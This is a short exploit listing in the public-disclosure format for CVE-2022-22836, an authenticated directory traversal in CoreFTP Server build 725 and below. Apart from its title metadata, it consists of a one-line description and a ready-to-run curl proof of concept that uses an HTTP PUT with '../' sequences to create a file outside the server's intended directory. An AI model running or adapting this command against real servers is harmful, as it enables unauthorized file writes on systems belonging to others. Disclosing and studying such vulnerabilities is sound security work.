# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)# Date: 08/01/2022# Exploit Author: LiamInfosec# Vendor Homepage: http://coreftp.com/# Version: build 725 and below# Tested on: Windows 10# CVE : CVE-2022-22836# Description:
CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.# Proof of Concept:
curl -k -X PUT -H "Host: <IP>"--basic -u <username>:<password> --data-binary "PoC."--path-as-is https://<IP>/../../../../../../whoops
